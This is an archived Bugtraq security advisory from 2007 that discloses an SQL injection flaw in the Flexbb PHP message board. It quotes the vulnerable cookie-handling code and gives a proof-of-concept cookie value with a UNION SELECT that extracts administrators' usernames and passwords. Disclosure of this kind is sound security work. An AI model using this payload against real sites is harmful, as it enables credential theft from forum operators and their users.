Bugtraq mailing list archives

[KAPDA::#64] - Flexbb Sql Injection


From: alireza hassani <trueend5 () yahoo com>
Date: Tue, 27 Mar 2007 01:57:24 -0700 (PDT)


KAPDA New advisory
Vendor: http://www.flexbb.net
Vulnerable Version: 1.0.0 10005 Beta Release 1
Bug: SQL Injection
Exploitation: Remote with browser

Description:
--------------------
Flexbb is a  freely available PHP-based message board
program that uses a MySQL database.

Vulnerability:
--------------------
Sql Injection:
The software does not properly validate user-supplied
input that may allow a remote user to launch Sql
injection attacks.
There are multiple Input Validation errors, for
example:
// Code Snippet
// Includes/Start.php
// Lines #190-197
if($_COOKIE['flexbb_lang_id'] == "")
{
        $lang_id = $config['default_lang_id'];
}
else
{
        $lang_id = $_COOKIE['flexbb_lang_id'];  //--->Input
Validation Error
}

POC:
--------------------
Condition: Magic quotes GPC = Off
GET: http://example.com/flexbb/index.php?debug=1
Cookie Name =  flexbb_lang_id
Cookie Value =  none' UNION SELECT 'en',`username`,
`password`,1,1 FROM `flexbb_users` WHERE `group` = '4

original Advisory:
--------------------
http://www.kapda.ir/advisory-481.html

Solution:
--------------------
No response from vendor, there is no solution at the
time of this entry.

Credit :
--------------------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]



 
____________________________________________________________________________________
TV dinner still cooling? 
Check out "Tonight's Picks" on Yahoo! TV.
http://tv.yahoo.com/


Current thread: